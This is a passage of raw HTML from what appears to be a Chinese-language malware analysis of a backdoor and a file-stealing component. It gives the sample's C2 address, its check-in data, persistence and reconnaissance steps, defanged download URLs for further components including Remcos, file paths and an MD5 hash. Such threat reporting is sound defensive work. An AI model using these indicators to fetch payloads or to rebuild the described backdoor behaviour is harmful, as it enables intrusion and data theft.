SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">248.50 KB (254464 bytes)</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件类型</span></span></p></td><td data-colwidth="354"><p data-mpa-action-id="mo2jab0j20f0"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">exe</span></span></span></p></td></tr></tbody></table></p></div></div></div><p style="text-indent: 2em;"><span leaf="">1）样本判断互斥体，保证单独执行。</span></p></div></div></div></div></div></div><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.36" data-w="400" style="width: 399.96px;height: 143.98px;" src="https://wechat2rss.xlab.app/img-proxy/?k=9ace8303&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLQbd90d3A7fQXIlYLFibJhhLn2xWOm31zciajWicicBmDJHib0wmULL6iab1AKKjEeAem1gq79TZ8v5KNMwlYel8fia9DnREfD1V4DyI%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou1t2y" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">连接C2:</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">213.111.185[.]78:443。</span></span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7663157894736842" data-w="475" style="width: 474.95px;height: 363.96px;" src="https://wechat2rss.xlab.app/img-proxy/?k=db8adc29&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJLBWoy3IHIRhpdbT4uafg1o9ey79bTEfnnMS3EnTibEObArX0KgP88qpA5f9I5hTlKlQgIwDH31YI8b9hibpAx7IunEquNs5Ge8%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou1l68" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本向C2发送上线包，上线包内容为：用户名@计算机名\n系统版本\n。</span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgoul8y">样本接收C2指令，执行cmd指令，并将对应结果传回C2。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.437046004842615" data-w="826" style="width: 553.74px;height: 242px;" src="https://wechat2rss.xlab.app/img-proxy/?k=d4010f63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLOegIPtDZZyc2P9f0mMEDRvwhUPzz8PoVibRTvrVF8YdA6rrUHIv4nAmkB8LRUCjuS8nyWal8BEibTQ0N7EESSx7NBxtSvbkDnM%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1k6x">捕获到攻击者命令有五类：</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgourlv" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第一类：将</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">taskhost.exe设置为计划任务和启动项</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.13933649289099526" data-w="1055" style="width: 553.74px;height: 77.13px;" src="https://wechat2rss.xlab.app/img-proxy/?k=0645bca1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKfBIbvNia4KSRnrsxcoyPhZzomNnUJJPlHicduzOddszXzllrFiaGdwsJhmbCnn9HjrZdQN47xvEB4Bic4OmFJHDOFXYpkcWibJ7QY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span><o:page></o:page></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1406">第二类：查看系统的信息</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.29295426452410384" data-w="809" style="width: 553.74px;height: 162.2px;" src="https://wechat2rss.xlab.app/img-proxy/?k=77cf4349&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJGYvXD9nHF0Vib3l3JdGzpREcia7N9CicHHE19kzDPwf7Fn0czIzvG0EccWibyDun5iceV4iaPG1VibUFh2I3COEaubqzzNxzu9zqBaU%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgous49">第三类：下载后门组件</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou20o2">url:</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouwce"><a href="https://domainregistationcheck[.]com/uploads/b1" target="_blank">https://domainregistationcheck[.]com/uploads/b1</a></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou20cw">保存到c:\programdata\usoshared\crsrs.exe</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.12878787878787878" data-w="924" style="width: 553.74px;height: 71.33px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2b8d3173&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLaPorZUs1D0klVN5W9D64ZGicIv9yPiaF3aad5qUQ9JJxnFCWRSGVBhTUZeiamFjKYlv6ojfk85Y2y97QAY4z95kgTQXbsIcO4sg%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou121f">第四类：静默安装python环境，并下载执行py脚本。python的运行环境会被安装到C:\\Python312中。</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" data-remoteid="" data-asynid="" src="http://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXIYjc3uDZ02ayFmDvibyAdPm1u85MhYaGOI8iad3eiaSxsljzticViaW7esaBEfL68vV0635DuPs7YluicMjjXldiatmeSxd2k5Jtn11Q/0?wx_fmt=png" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="0.24242424242424243" data-s="" data-type="" data-w="891" aria-label="" aria-braillelabel="" aria-description="" height="" hspace="" ismap="" opacity="" sizes="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" title="" type="" usemap="" vspace="" width="" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="" data-retry="" mpa-font-style="mo19dgoug0s"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">注：未捕获到对应python脚本</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.24242424242424243" data-w="891" style="width: 553.74px;height: 134.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7a0f5ad2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIYjc3uDZ02ayFmDvibyAdPm1u85MhYaGOI8iad3eiaSxsljzticViaW7esaBEfL68vV0635DuPs7YluicMjjXldiatmeSxd2k5Jtn11Q%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou18ck">第五类：下载Remcos后门</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou1dml" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">url:</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> <a href="http://46.30.191[.]221/pw.exe" target="_blank">http://46.30.191[.]221/pw.exe</a></span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouqsd">样本被保存到</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou2du">c:\programdata\usoshared\logs\imagingdevices.exe</span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.10526315789473684" data-w="931" style="width: 553.74px;height: 58.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7d5f6eb6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKR1erVR57vB1N7Z1Grb4wy03ElX6sibwX5wqpTjAmKXwm8oqibe5eNdHr9N11VpAxLpJYOpjNlwwf7UCBXMaQG8iazEZDDC9owI4%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;"><p style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou47m"><span textstyle="" style="font-weight: bold;">文件窃密组件</span></span></p></li></ul><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="mo19dgoueqj" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">该工具为文件窃密组件，主要功能是用于监测存储设备变更情况，并将存储设备的文件数据同步到C2服务器中。</span></span></p><div style="margin-left: 0;margin-right: 0;"><div><div><div><div><div><div><div><div><p><table style="width:481px;"><tbody><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">d286d439393bde76b734bd3406628d47</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件名称</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">crsrs.exe</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件大小</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">39.5 KB (40448 bytes)</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件类型</span></span></p></td><td data-colwidth="354"><p data-mpa-action-id="mo2jakcn11um"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">exe</span></span></span></p></td></tr></tbody></table></p></div></div></div><p style="text-indent: 2em;"><span leaf="">1）样本检查互斥体和第一个命令行参数。</span></p></div></div></div></div></div></div><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.10171428571428572" data-w="875" style="width: 553.74px;height: 56.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=245361ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLD9SbkUCxWiak2W3LgMSSicpm0n5JFolkEiaNwuZ1mTQrxY4dicbTyGM8uyAq32DjdFQOKbj4icrpeRM7mUCOp26BiceRica1nWphbJ4%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou1w29" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 